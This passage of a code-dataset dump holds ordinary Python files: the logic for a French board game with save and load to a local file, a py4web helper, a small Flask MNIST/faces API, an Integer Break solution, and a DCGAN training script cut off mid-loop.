nb_joueurs, sortieActive, tempsRestant, touchesPartie, touchesPartieParJoueur, listeGagnants, matriceTuiles, mursVer, mursHor, tuilesPosees, dicVortex, dicEsc, telekinesiesRestantes)\n \n elif entreeClavier == 'Escape':\n tk.ferme_fenetre()\n\n return 0\n\ndef escalier(numeroPion, dicEsc, infoPion, listeGagnants):\n \"\"\"Transporte un pion au bon endroit lors de l'usage d'un escalier\"\"\"\n if infoPion[numeroPion][0] not in dicEsc.values():\n return\n\n # Liste des positions occupées\n valeursDico = list(infoPion.values())\n positionOccupee = [valeursDico[i][0] for i in range(len(valeursDico)) if i + 1 not in listeGagnants]\n\n # Vérification que la case n'est pas occupée\n if dicEsc[infoPion[numeroPion][0]] in positionOccupee:\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n\n # Si toutes les conditions sont validées, on effectue le changement de position\n infoPion[numeroPion] = [dicEsc[infoPion[numeroPion][0]], infoPion[numeroPion][0]]\n return\n\ndef activerVortex(numeroPion, dicVortex, infoPion, modeVortex, vortexActif, listeGagnants = []):\n \"\"\"Active le \"mode vortex\" à l'aide de la touche v pendant lequel il est possible de choisir un vortex.\n Si un vortex a été choisi avec selectVortex(), on se téléporte à la bonne position.\n Sinon, il ne se passe rien et on sort du mode vortex.\"\"\"\n if modeVortex == [0]:\n modeVortex[0] = 1\n selectVortex(vortexActif, dicVortex, numeroPion)\n return\n\n if modeVortex == [1] and vortexActif == [0]:\n modeVortex[0] = 0\n return\n\n if vortexActif != [0]:\n # Liste des positions occupées\n valeursDico = list(infoPion.values())\n positionOccupee = [valeursDico[i][0] for i in range(len(valeursDico)) if i + 1 not in listeGagnants]\n # Vérification que la case n'est pas occupée\n if dicVortex[numeroPion][vortexActif[0]-1] in positionOccupee:\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n # Si toutes les conditions sont validées, on effectue le changement de position\n infoPion[numeroPion] = [dicVortex[numeroPion][vortexActif[0]-1], infoPion[numeroPion][0]]\n # On remet à 0 les variables des vortex\n modeVortex[0] = 0\n vortexActif[0] = 0\n return\n\ndef selectVortex(vortexActif, dicVortex, numeroPion):\n \"\"\"En appuyant sur la touche b, on fait rouler le vortex sur lequel on souhaite se téléporter. En appuyant deux fois, on revient à 0, ce qui permet de ne pas se téléporter.\"\"\"\n vortexActif[0] = (vortexActif[0] + 1) % (len(dicVortex[numeroPion]) + 1)\n return\n\ndef activerModeTelekinesie(infoPion, telekinesieIndexTuileActive, tuilesPosees, modeTelekinesie, matriceTerrain, matriceTuiles, mursVer, mursHor, tuilesRestantes, dicEsc, dic2, dic7, dicVortex, telekinesiesRestantes):\n \"\"\"Active le mode de sélection de la case sur laquelle on veut utiliser la télékinésie\"\"\"\n if matriceTerrain[infoPion[3][0][0]][infoPion[3][0][1]] not in ('exp1', 'exp2', 'exp3', 'exp4'):\n return\n \n if modeTelekinesie == [0]:\n modeTelekinesie[0] = 1\n selectTuileTelekinesie(telekinesieIndexTuileActive, tuilesPosees, matriceTuiles, infoPion, mursVer, mursHor, matriceTerrain)\n return\n\n if modeTelekinesie == [1] and telekinesieIndexTuileActive == [0]:\n modeTelekinesie[0] = 0\n return\n\n if telekinesieIndexTuileActive != [0]:\n pionSurExploration(matriceTerrain, matriceTuiles, mursVer, mursHor, infoPion, tuilesRestantes, dicEsc, dic2, dic7, dicVortex, tuilesPosees, False, telekinesieIndexTuileActive, modeTelekinesie, telekinesiesRestantes)\n modeTelekinesie[0] = 0\n return\n\ndef selectTuileTelekinesie(telekinesieIndexTuileActive, tuilesPosees, matriceTuiles, infoPion, mursVer, mursHor, matriceTerrain):\n \"\"\"Passe à la case suivante lors du choix pendant la télékinésie\"\"\"\n telekinesieIndexTuileActive[0] = telekinesieIndexTuileActive[0]+1 if len(tuilesPosees) > telekinesieIndexTuileActive[0]+1 else 0\n \n if not tuileValide(tuilesPosees[telekinesieIndexTuileActive[0]], int(matriceTuiles[infoPion[3][0][0]][infoPion[3][0][1]][0]), infoPion, matriceTuiles, tuilesPosees, matriceTerrain, mursVer, mursHor):\n selectTuileTelekinesie(telekinesieIndexTuileActive, tuilesPosees, matriceTuiles, infoPion, mursVer, mursHor, matriceTerrain)\n return\n\ndef miniTuile(matriceTuiles):\n \"\"\"Fournit la matrice simplifiée déduite de matriceTuiles\"\"\"\n mini = [['$' for i in range(14)] for j in range(14)]\n for ligneMini in range(len(mini)):\n for colonneMini in range(len(mini[0])):\n ligneGrand = (ligneMini*4)+colonneMini-7\n colonneGrand = (colonneMini*4)-ligneMini+5\n \n if 0 <= ligneGrand < 50 and 0 <= colonneGrand < 50:\n if matriceTuiles[ligneGrand][colonneGrand] != '$':\n mini[ligneMini][colonneMini] = matriceTuiles[ligneGrand][colonneGrand]\n return mini\n\ndef detecterIntegrite(miniMatrice, positionASuppr, nbTuilesPosees):\n \"\"\"Evalue si le fait de retirer une tuile du terrain le coupe en 2 ou non\"\"\"\n casesVisitees = set()\n matriceTronquee = list(map(list, miniMatrice))\n matriceTronquee[positionASuppr[0]][positionASuppr[1]] = \"$\"\n nbTuilesApres = len(detecterIntegriteRec(matriceTronquee, 6, 6, casesVisitees))\n if (nbTuilesPosees - 1) == nbTuilesApres:\n return True, casesVisitees\n return False, 0\n\ndef detecterIntegriteRec(matrice,i, j, casesVisitees):\n \"\"\"Fonction recursive associée à la fonction précédente\"\"\"\n casesVisitees.add((i, j))\n for (p, q) in {(i - 1, j), (i, j + 1), (i + 1, j), (i, j - 1)}:\n if p in range(0, len(matrice)) and q in range(0, len(matrice[0])):\n if matrice[p][q] != \"$\" and (p, q) not in casesVisitees:\n detecterIntegriteRec(matrice, p, q, casesVisitees)\n return casesVisitees\n\ndef tuileAccessible(idTuile, ensembleTuile, matriceTerrain, matriceTuiles, mursVer, mursHor):\n \"\"\"indique si la tuile possède au moins un accès à une tuile de l'ensemble\"\"\"\n # Commencons par trouver les coordonnées de la tuile idTuile\n HG = None\n for ligne in range(len(matriceTuiles)):\n for colonne in range(len(matriceTuiles)):\n if matriceTuiles[ligne][colonne] != \"$\":\n if int(matriceTuiles[ligne][colonne][0]) == idTuile and HG == None:\n HG = (ligne, colonne)\n \n # Déduisons-en les coordonnées des sorties :\n listeSortie = [[0, 2], [2, 3], [3, 1], [1, 0]]\n for i in range(len(listeSortie)):\n listeSortie[i][0] += HG[0]\n listeSortie[i][0] += HG[1]\n \n # trouvons les coordonnées des murs correspondant dans leur matrices respectives\n listeMurSortie = [[0, 0], [0, 1], [1, 0], [0, 0]]\n for i in range(len(listeMurSortie)):\n listeMurSortie[i][0] += listeSortie[i][0]\n listeMurSortie[i][1] += listeSortie[i][1]\n \n # trouvons les coordonnées des cases derrière les murs respectivment\n listeCaseSortie = [[-1, 0], [0, 1], [1, 0], [0, -1]]\n for i in range(len(listeMurSortie)):\n if listeCaseSortie[i][0]+listeSortie[i][0] in range(0,50):\n listeCaseSortie[i][0] += listeSortie[i][0]\n else:\n listeCaseSortie[i][0] = 0\n if listeCaseSortie[i][1]+listeSortie[i][1] in range(0,50):\n listeCaseSortie[i][1] += listeSortie[i][1]\n else:\n listeCaseSortie[i][1] = 0\n \n # trouvons les id des Tuiles de listeCaseSortie\n listeIdTuiles = [0]*4\n for i, coor in enumerate(listeCaseSortie):\n if coor != 0: \n ligne, colonne = coor\n if matriceTuiles[ligne][colonne][0] != '$':\n listeIdTuiles[i] = int(matriceTuiles[ligne][colonne][0])\n else :\n listeIdTuiles[i] = '$'\n \n # trouvons lesquelles de ces cases sont accessibles\n listeConnection = list()\n for i in range(len(listeMurSortie)):\n if not i%2:\n if not mursHor[listeMurSortie[i][0]][listeMurSortie[i][1]]:\n listeConnection.append(listeIdTuiles[i])\n else:\n if not mursVer[listeMurSortie[i][0]][listeMurSortie[i][1]]:\n listeConnection.append(listeIdTuiles[i])\n \n for elem in listeConnection:\n if not elem in ensembleTuile:\n listeConnection.remove(elem)\n \n if len(listeConnection) > 0:\n return True\n return False\n \n \n\ndef tuileValide(tuileAValider, tuileDActivation, infoPion, matriceTuiles, tuilesPosees, matriceTerrain, mursVer, mursHor):\n \"\"\"\n Prend une tuile en entrée et renvoie True ou False si on a le droit ou non d'utiliser la télékinésie dessus\n \"\"\"\n if tuileAValider == tuileDActivation:\n return False\n \n if tuileAValider == 0:\n return True\n \n if tuileAValider == 1:\n return False\n \n # Vérif que la case est vide\n sequence = [i for i in range(1,8)]\n if pionSurTuile(matriceTuiles, sequence, tuileAValider, infoPion):\n return False\n \n # Vérification qu'on ne coupe pas le terrain\n # étape 1 au niveau des tuiles (continuité)\n tuilesContinue = False\n miniMatriceTuile = miniTuile(matriceTuiles)\n \n # for i in range(len(miniMatriceTuile)):\n # print(miniMatriceTuile[i])\n \n # Trouvons les coordonnées de la tuile dans la mini matrice\n for ligne in range(len(miniMatriceTuile)):\n for colonne in range(len(miniMatriceTuile[0])):\n if miniMatriceTuile[ligne][colonne] != '$':\n #print(\"tuileAValider =\", tuileAValider)\n if int(miniMatriceTuile[ligne][colonne][0]) == tuileAValider:\n coor = (ligne, colonne)\n # print(\"coor\",coor)\n tuilesContinue, ensembleCoorTuile = detecterIntegrite(miniMatriceTuile, coor, len(tuilesPosees)-1)\n if not tuilesContinue:\n return False\n \n # # au niveau des murs\n # # création de l'ensembleTuile\n # ensembleTuile = set()\n # for elem in ensembleCoorTuile:\n # ensembleTuile.add(int(miniMatriceTuile[elem[0]][elem[1]][0]))\n \n # for tuile in ensembleTuile:\n # connection = tuileAccessible(tuile, ensembleTuile, matriceTerrain, matriceTuiles, mursVer, mursHor)\n # if not connection:\n # print(\"tuile non accessible\", tuileAValider)\n # return False\n \n return True\n \ndef telekinesie(matriceTerrain, matriceTuiles, idTuile, dicEsc, dicVortex, telekinesiesRestantes):\n \"\"\"Modifie la matriceTerrain et la matriceTuile de manière à réaliser \n l'action de télékinésie en supprimmant l'ancienne position de la tuile déplacée\"\"\"\n # On commence par rechercher la position (HG) de la tuile à déplacer dans matriceTuile\n telekinesiesRestantes[0] = telekinesiesRestantes[0] - 1\n HG = None\n for ligne in range(len(matriceTuiles)):\n for colonne in range(len(matriceTuiles[0])):\n if matriceTuiles[ligne][colonne][0] != \"$\":\n if int(matriceTuiles[ligne][colonne][0]) == idTuile and HG == None:\n HG = (ligne, colonne)\n break\n # Ensuite, il nous faut extraire les données de cette tuile (elle est supposée vide de pions)\n for ligne in range(4):\n for colonne in range(4):\n if type(matriceTerrain[ligne+HG[0]][colonne+HG[1]]) is str:\n if matriceTerrain[ligne+HG[0]][colonne+HG[1]][:-1] == 'vortex':\n dicVortex[int(matriceTerrain[ligne+HG[0]][colonne+HG[1]][-1])].remove((ligne+HG[0], colonne+HG[1]))\n matriceTerrain[ligne+HG[0]][colonne+HG[1]] = None\n matriceTuiles[ligne+HG[0]][colonne+HG[1]] = \"$\"\n if (ligne+HG[0], colonne+HG[1]) in dicEsc.keys():\n dicEsc.pop((ligne+HG[0], colonne+HG[1]))\n \ndef pionSurTuile(matriceTuiles, sequencePion, idTuile, infoPion):\n \"\"\"renvoie True si l’un des pions de la sequence se trouve sur la Tuile idTuile\"\"\"\n # Trouvons la position HG de la tuile\n if idTuile == 0:\n return False\n HG = None\n for ligne in range(len(matriceTuiles)):\n for colonne in range(len(matriceTuiles)):\n if matriceTuiles[ligne][colonne][0] != \"$\":\n a = int(matriceTuiles[ligne][colonne][0])\n if a == idTuile and HG == None:\n HG = (ligne, colonne)\n break\n # Regardons maintenant si un pion se trouve sur cette tuile\n for pion in sequencePion:\n if pion in infoPion.keys():\n positionPion = infoPion[pion][0]\n if HG[0] <= positionPion[0] and positionPion[0] <= HG[0]+3 and HG[1] <= positionPion[1] and positionPion[1] <= HG[1]+3:\n return True\n return False\n\ndef finPartie(partieGagnee, partiePerdue):\n \"\"\"Affichage de l'écran de fin\"\"\"\n \n if partiePerdue:\n tk.efface('chronometre')\n tk.texte(100, 100, \"Temps écoulé\", taille = 30, couleur = 'red')\n tk.mise_a_jour()\n \n if partieGagnee:\n tk.efface('sortie')\n tk.efface('chronometre')\n tk.texte(100, 100, \"Vous avez gagné !\", taille = 30, couleur = 'light green')\n tk.mise_a_jour()\n\ndef verifVictoire(listeGagnants):\n \"\"\"Renvoie True si la partie est gagnée\"\"\"\n if len(listeGagnants) == 4:\n sleep(1)\n return True\n return False\n\ndef sauvegarderPartie(matriceTerrain, infoPion, nb_joueurs, sortieActive, tempsRestant, touchesPartie, touchesPartieParJoueur, listeGagnants, matriceTuiles, mursVer, mursHor, tuilesPosees, dicVortex, dicEsc, telekinesiesRestantes):\n \"\"\" Sauvegarde et quitte la partie \"\"\"\n with open(\"save.txt\", \"w\") as save:\n # Enregistrement matriceTerrain\n for i in range(len(matriceTerrain)):\n ligne = []\n for element in matriceTerrain[i]:\n ligne.append(str(element))\n save.write(\" \".join(ligne)+\"\\n\")\n save.write(\"\\n\")\n \n # Enregistrement infoPion\n data_infoPion = infoPion.items()\n for cleValeur in data_infoPion:\n ligne = []\n ligne.append(str(cleValeur[0]))\n for couple in cleValeur[1]:\n chaine = []\n for element in couple:\n chaine.append(str(element))\n chaine = \",\".join(chaine)\n ligne.append(chaine)\n save.write(\" \".join(ligne)+\"\\n\")\n save.write('\\n')\n \n # nb_joueurs, sortieActive, tempsRestant\n save.write(str(nb_joueurs)+\"\\n\\n\"+str(sortieActive)+\"\\n\\n\"+str(tempsRestant)+\"\\n\")\n \n # touchesPartie\n data_touchesPartie = touchesPartie.items()\n for cleValeur in data_touchesPartie:\n ligne = []\n ligne. append(cleValeur[0])\n for valeur in cleValeur[1]:\n if valeur is tuple:\n chaine = []\n for element in valeur:\n chaine.append(str(element))\n chaine = \",\".join(chaine)\n ligne.append(chaine)\n else:\n ligne.append(str(valeur))\n save.write(\" \".join(ligne)+\"\\n\")\n save.write('\\n')\n \n # touchesPartieParJoueur\n data_touchesPartieParJoueur = touchesPartieParJoueur.items()\n for cleValeur1 in data_touchesPartieParJoueur:\n data_dico = cleValeur1[1].items()\n for cleValeur2 in data_dico:\n ligne = [str(cleValeur1[0])]\n ligne.append(str(cleValeur2[0]))\n ligne.append(str(cleValeur2[1]))\n save.write(' '.join(ligne)+'\\n')\n save.write('\\n')\n \n \n #listeGagnants\n for element in listeGagnants:\n save.write(str(element)+\"\\n\")\n save.write('\\n')\n \n # matriceTuiles\n for ligne in range(len(matriceTuiles)):\n chaine = \"\"\n for colonne in range(len(matriceTuiles)):\n chaine += matriceTuiles[ligne][colonne] + ' '\n chaine += '\\n'\n save.write(chaine)\n save.write('\\n')\n \n # mursVer\n for ligne in range(len(mursVer)):\n chaine = ''\n for colonne in range(len(mursVer[0])):\n chaine += str(mursVer[ligne][colonne])+' '\n chaine += '\\n'\n save.write(chaine)\n save.write('\\n')\n \n # mursHor\n for ligne in range(len(mursHor)):\n chaine = ''\n for colonne in range(len(mursHor[0])):\n chaine += str(mursHor[ligne][colonne])+' '\n chaine += '\\n'\n save.write(chaine)\n save.write('\\n')\n \n # tuilesPosees\n chaine = ''\n for element in tuilesPosees:\n chaine += str(element)+' '\n save.write(chaine)\n save.write('\\n\\n')\n \n # dicVortex\n for key, value in dicVortex.items():\n chaine = str(key)+':'\n for couple in value:\n chaine += str(couple[0])+','+str(couple[1])+' '\n chaine += '\\n'\n save.write(chaine)\n save.write('\\n')\n \n # dicEsc\n for key, value in dicEsc.items():\n chaine = str(key[0])+','+str(key[1])+':'+str(value[0])+','+str(value[1])+'\\n'\n save.write(chaine)\n \n # telelekinesiesRestantes\n save.write('\\n'+str(telekinesiesRestantes[0]))\n \n \n \n tk.ferme_fenetre()\n \ndef chargerPartie():\n \"\"\"Charge la partie, de manière à pouvoir continuer la dernière sauvegarde\"\"\"\n with open('save.txt','r') as save:\n data_save = save.read()\n \n data_save = data_save.split('\\n')\n \n # matriceTerrain\n compteur = 0\n while data_save[compteur] != '':\n compteur += 1 \n \n matriceTerrain = []\n for ligne in data_save[:compteur]:\n ligne = ligne.split(' ')\n for i in range(len(ligne)):\n if ligne[i] == '1' or ligne[i] == '0':\n ligne[i] = int(ligne[i])\n elif ligne[i] == 'None':\n ligne[i] = None\n else:\n ligne[i]\n matriceTerrain.append(ligne)\n \n # infoPion\n debut = compteur+1\n compteur += 1\n while data_save[compteur] != '':\n compteur += 1\n \n infoPion = dict()\n for ligne in data_save[debut:compteur]:\n ligne = ligne.split(' ')\n infoPion[int(ligne[0])] = [[int(ligne[1].split(',')[0]), int(ligne[1].split(',')[1])], [int(ligne[2].split(',')[0]), int(ligne[2].split(',')[1])]]\n \n # nb_joueurs, sortieActive, tempsRestant\n compteur += 1\n nb_joueurs = int(data_save[compteur])\n compteur += 2\n sortieActive = True if data_save[compteur] == 'True' else False\n compteur += 2 \n tempsRestant = float(data_save[compteur])\n compteur += 1 \n \n # touchesPartie \n touchesPartie = dict()\n debut = compteur\n while data_save[compteur] != '':\n compteur += 1\n for ligne in data_save[debut:compteur]:\n ligne = ligne.split()\n if ligne[0] == 'vortex':\n touchesPartie.setdefault('vortex', None)\n touche = \" \".join(ligne[1:3]).strip(\"(')\").split(\"', '\")\n touchesPartie[\"vortex\"] = (tuple(touche), int(ligne[3]))\n else :\n touchesPartie[ligne[0]] = (ligne[1], int(ligne[2]))\n \n # touchesPartieParJoueur\n touchesPartieParJoueur = dict()\n compteur += 1\n debut = compteur\n while data_save[compteur] != '':\n compteur += 1\n for ligne in data_save[debut:compteur]:\n ligne = ligne.split()\n if ligne[1] == 'vortex' :\n if touchesPartieParJoueur.get(int(ligne[0])) == None:\n touchesPartieParJoueur.setdefault(int(ligne[0]), dict())\n touchesPartieParJoueur[int(ligne[0])]['vortex'] = tuple(\" \".join(ligne[2:4]).strip(\"(')\").split(\"', '\"))\n \n elif ligne[1] == 'elfe' :\n if touchesPartieParJoueur.get(int(ligne[0])) == None:\n touchesPartieParJoueur.setdefault(int(ligne[0]), dict())\n touchesPartieParJoueur[int(ligne[0])]['elfe'] = tuple(\" \".join(ligne[2:4]).strip(\"(')\").split(\"', '\"))\n \n else:\n if touchesPartieParJoueur.get(int(ligne[0])) == None:\n touchesPartieParJoueur.setdefault(int(ligne[0]), dict())\n touchesPartieParJoueur[int(ligne[0])][ligne[1]] = ligne[2]\n compteur += 1 \n \n # listeGagnants\n listeGagnants = list()\n debut = compteur\n while data_save[compteur] != '':\n compteur += 1\n for ligne in data_save[debut:compteur]:\n if ligne != '':\n listeGagnants.append(int(ligne))\n compteur += 1\n \n # matriceTuiles\n matriceTuiles = []\n debut = compteur\n while data_save[compteur] != '':\n compteur += 1\n for ligne in data_save[debut:compteur]:\n ligne = ligne.strip().split(' ')\n matriceTuiles.append(ligne)\n compteur += 1\n \n \n # mursVer\n mursVer = list()\n debut = compteur\n while data_save[compteur] != '':\n compteur += 1\n for ligne in data_save[debut:compteur]:\n ligne = list(map(lambda x: int(x), ligne.strip().split()))\n mursVer.append(ligne)\n compteur += 1\n \n \n # mursHor\n mursHor = list()\n debut = compteur\n while data_save[compteur] != '':\n compteur += 1\n for ligne in data_save[debut:compteur]:\n ligne = list(map(lambda x: int(x), ligne.strip().split()))\n mursHor.append(ligne)\n compteur += 1\n \n # tuilesPosees\n tuilesPosees = list(map(lambda x: int(x) ,data_save[compteur].strip().split(' ')))\n compteur += 2\n \n \n # dicVortex\n debut = compteur\n while data_save[compteur] != '':\n compteur += 1\n dicVortex = dict()\n for ligne in data_save[debut:compteur]:\n ligne = ligne.strip().split(':')\n dicVortex.setdefault(int(ligne[0]), list())\n couples = ligne[1].split(' ')\n for duo in couples:\n nombre1 = int(duo.split(',')[0])\n nombre2 = int(duo.split(',')[1])\n dicVortex[int(ligne[0])].append((nombre1, nombre2))\n compteur += 1\n\n \n # dicEsc\n debut = compteur\n while data_save[compteur] != '':\n compteur += 1\n dicEsc = dict()\n for ligne in data_save[debut:compteur]:\n ligne = ligne.strip().split(':')\n liste = []\n for couple in ligne:\n couple = couple.split(',')\n nombre1 = int(couple[0])\n nombre2 = int(couple[1])\n liste.append((nombre1, nombre2))\n dicEsc[liste[0]] = liste[1]\n compteur += 1\n \n # telekinesiesRestantes\n telekinesiesRestantes = [int(data_save[compteur].strip())]\n \n return matriceTerrain, infoPion, nb_joueurs ,sortieActive , tempsRestant, touchesPartie, touchesPartieParJoueur, listeGagnants, matriceTuiles, mursVer, mursHor, tuilesPosees, dicVortex, dicEsc, telekinesiesRestantes\n","sub_path":"moduleLogique.py","file_name":"moduleLogique.py","file_ext":"py","file_size_in_byte":52542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"312734863","text":"def count_expected_args(f):\n if hasattr(f,'func_code'):\n # python 2\n n = f.func_code.co_argcount - len(f.func_defaults or [])\n if getattr(f, 'im_self', None):\n n -= 1\n elif hasattr(f, '__code__'):\n # python 3\n n = f.__code__.co_argcount - len(f.__defaults__ or [])\n if getattr(f, '__self__', None):\n n -= 1\n else:\n # doh!\n n = 1\n return n\n\ndef represent(field, value, record):\n f = field.represent\n if not callable(f):\n return str(value)\n n = count_expected_args(f)\n if n == 1:\n return f(value)\n elif n == 2:\n return f(value, record)\n else:\n raise RuntimeError(\"field representation must take 1 or 2 args\")\n","sub_path":"py4web/utils/dbrepresent.py","file_name":"dbrepresent.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"500416702","text":"from flask import Flask, request, send_from_directory, jsonify\nfrom flask_cors import CORS\nfrom mnist_handlers import sort_pc, fetch_rnd_digit, load_data\nfrom faces_handlers import fetch_rnd_img\n\nfrom keras.models import Model, load_model\nimport numpy as np\nimport tensorflow as tf\n\nfrom constants.constants import mnist_pc_order, mnist_min, mnist_max, mnist_step, faces_pc_order, faces_min, faces_max, faces_step\n\n#====SETUP=====\nmnist_data = None\nprint(\"Starting server..\")\napp = Flask(__name__,static_folder=\"\",static_url_path='')\nCORS(app)\n\n@app.route('/')\ndef fetch_model(path):\n return app.send_static_file(path)\n\n#========= Methods for mnist methods =========\ndef load_mnist_data():\n global mnist_data\n mnist_data = np.load(\"./data/mnist/mnist_data.npy\")\n\n@app.route('/api/mnist/fetch-pc-info',methods=[\"GET\"])\ndef fetch_mnist_min_max_step():\n d = {}\n d[\"order\"] = mnist_pc_order\n d[\"min\"] = mnist_min\n d[\"max\"] = mnist_max\n d[\"step\"] = mnist_step\n return jsonify(d)\n\n@app.route('/api/mnist/fetch-digit',methods=[\"GET\"])\ndef fetch_digit():\n digit = fetch_rnd_digit(mnist_data)\n return jsonify(digit)\n'''\n@app.route('/api/mnist/fetch-pc-order',methods=[\"GET\"])\ndef fetch_pc_order():\n return jsonify(mnist_pc_order)\n'''\n#========= Methods for faces methods =========\n@app.route('/api/faces/fetch-face',methods=[\"GET\"])\ndef fetch_face():\n face = fetch_rnd_img()\n return jsonify(face)\n\n@app.route('/api/faces/fetch-pc-info',methods=[\"GET\"])\ndef fetch_faces_pc_info():\n d = {}\n d[\"order\"] = faces_pc_order\n d[\"min\"] = faces_min\n d[\"max\"] = faces_max\n d[\"step\"] = faces_step\n return jsonify(d)\n\n#Load data into variable....\nprint(\"Loading mnist data...\")\nload_mnist_data()\n#===============\n","sub_path":"model_api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"167243018","text":"class Solution(object):\n def integerBreak(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n #define DP[k] is the optimal for k\n DP = [0] * (n+1)\n for i in range(2,n+1):\n for j in range(1,i): #last divide\n DP[i] = max(DP[j]*(i-j), DP[i], j*(i-j)) #break the last divide or not\n return DP[n]\n","sub_path":"Integer-Break.py","file_name":"Integer-Break.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"585754318","text":"import os, time, itertools, imageio, pickle\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nimport cv2, time\r\nfrom sklearn.datasets import fetch_mldata\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.utils import shuffle\r\n\r\nclass DCGAN():\r\n def __init__(self):\r\n self.history = {'train_D_loss': [], 'train_G_loss': [], 'val_D_loss': [], 'val_G_loss': []}\r\n\r\n def lrelu(self, x, th=0.2):\r\n return tf.maximum(th * x, x)\r\n\r\n # G(z)\r\n def generator(self, x, isTrain=True, reuse=False):\r\n print('---------- build generator ---------')\r\n with tf.variable_scope('generator', reuse=reuse):\r\n # 1st hidden layer\r\n conv1 = tf.layers.conv2d_transpose(x, 1024, [4, 4], strides=(1, 1), padding='valid')\r\n lrelu1 = self.lrelu(tf.layers.batch_normalization(conv1, training=isTrain), 0.2)\r\n\r\n # 2nd hidden layer\r\n conv2 = tf.layers.conv2d_transpose(lrelu1, 512, [4, 4], strides=(2, 2), padding='same')\r\n lrelu2 = self.lrelu(tf.layers.batch_normalization(conv2, training=isTrain), 0.2)\r\n\r\n # 3rd hidden layer\r\n conv3 = tf.layers.conv2d_transpose(lrelu2, 256, [4, 4], strides=(2, 2), padding='same')\r\n lrelu3 = self.lrelu(tf.layers.batch_normalization(conv3, training=isTrain), 0.2)\r\n\r\n # 4th hidden layer\r\n conv4 = tf.layers.conv2d_transpose(lrelu3, 128, [4, 4], strides=(2, 2), padding='same')\r\n lrelu4 = self.lrelu(tf.layers.batch_normalization(conv4, training=isTrain), 0.2)\r\n\r\n # output layer\r\n conv5 = tf.layers.conv2d_transpose(lrelu4, 1, [4, 4], strides=(2, 2), padding='same')\r\n o = tf.nn.tanh(conv5)\r\n\r\n return o\r\n\r\n # D(x)\r\n def discriminator(self, x, isTrain=True, reuse=False):\r\n if not reuse:\r\n print('---------- build discriminator ---------')\r\n with tf.variable_scope('discriminator', reuse=reuse):\r\n # 1st hidden layer\r\n conv1 = tf.layers.conv2d(x, 128, [4, 4], strides=(2, 2), padding='same')\r\n lrelu1 = self.lrelu(conv1, 0.2)\r\n\r\n # 2nd hidden layer\r\n conv2 = tf.layers.conv2d(lrelu1, 256, [4, 4], strides=(2, 2), padding='same')\r\n lrelu2 = self.lrelu(tf.layers.batch_normalization(conv2, training=isTrain), 0.2)\r\n\r\n # 3rd hidden layer\r\n conv3 = tf.layers.conv2d(lrelu2, 512, [4, 4], strides=(2, 2), padding='same')\r\n lrelu3 = self.lrelu(tf.layers.batch_normalization(conv3, training=isTrain), 0.2)\r\n\r\n # 4th hidden layer\r\n conv4 = tf.layers.conv2d(lrelu3, 1024, [4, 4], strides=(2, 2), padding='same')\r\n lrelu4 = self.lrelu(tf.layers.batch_normalization(conv4, training=isTrain), 0.2)\r\n\r\n # output layer\r\n conv5 = tf.layers.conv2d(lrelu4, 1, [4, 4], strides=(1, 1), padding='valid')\r\n o = tf.nn.sigmoid(conv5)\r\n\r\n return o, conv5\r\n\r\n def fit(self, num_epoch=100, batch_size=30, lr=0.0001):\r\n x = tf.placeholder(tf.float32, shape=(None, 64, 64, 1))\r\n z = tf.placeholder(tf.float32, shape=(None, 1, 1, 100))\r\n isTrain = tf.placeholder(tf.bool)\r\n\r\n # networks : generator\r\n G_z = self.generator(z, isTrain)\r\n\r\n # networks : discriminator\r\n D_real, D_real_logits = self.discriminator(x, isTrain)\r\n D_fake, D_fake_logits = self.discriminator(G_z, isTrain, reuse=True)\r\n\r\n # loss for each network\r\n D_loss_real = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_real_logits, labels=tf.ones([batch_size, 1, 1, 1])))\r\n D_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_fake_logits, labels=tf.zeros([batch_size, 1, 1, 1])))\r\n D_loss = D_loss_real + D_loss_fake\r\n G_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_fake_logits, labels=tf.ones([batch_size, 1, 1, 1])))\r\n\r\n # trainable variables for each network\r\n T_vars = tf.trainable_variables()\r\n D_vars = [var for var in T_vars if var.name.startswith('discriminator')]\r\n G_vars = [var for var in T_vars if var.name.startswith('generator')]\r\n\r\n # optimizer for each network\r\n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\r\n D_optim = tf.train.AdamOptimizer(lr, beta1=0.5).minimize(D_loss, var_list=D_vars)\r\n G_optim = tf.train.AdamOptimizer(lr, beta1=0.5).minimize(G_loss, var_list=G_vars)\r\n\r\n # prepare data\r\n mnist = fetch_mldata('MNIST original', data_home='.')\r\n mnist_data = np.reshape(mnist.data, (-1, 28, 28))\r\n use_data = np.empty(shape=(70000, 64, 64))\r\n for itr in range(len(mnist_data)):\r\n use_data[itr] = cv2.resize(mnist_data[itr], (64, 64)).astype(np.float) / 255\r\n use_data = use_data[:, :, :, np.newaxis]\r\n print(use_data.shape)\r\n X_trainval, X_test, y_trainval, y_test = train_test_split(use_data, mnist.target, test_size=0.001)\r\n X_train, X_val, y_train, y_val = train_test_split(X_trainval, y_trainval, test_size=0.001)\r\n\r\n print(X_train.shape, X_val.shape, X_test.shape)\r\n num_batch = len(X_train) // batch_size\r\n\r\n # open session and initialize all variables\r\n sess = tf.Session()\r\n sess.run(tf.global_variables_initializer())\r\n\r\n print()\r\n print('Start Training!')\r\n for epoch in range(num_epoch):\r\n X_ = shuffle(X_train)\r\n start_time = time.time()\r\n for batch in range(num_batch):\r\n start = batch * batch_size\r\n end = start + batch_size\r\n\r\n\r\n z_ = np.random.normal(0, 1, (batch_size, 1, 1, 100))\r\n d_loss, d_optim = sess.run([D_loss, D_optim], feed_dict={x: X_[start:end], z: z_, isTrain: True})\r\n 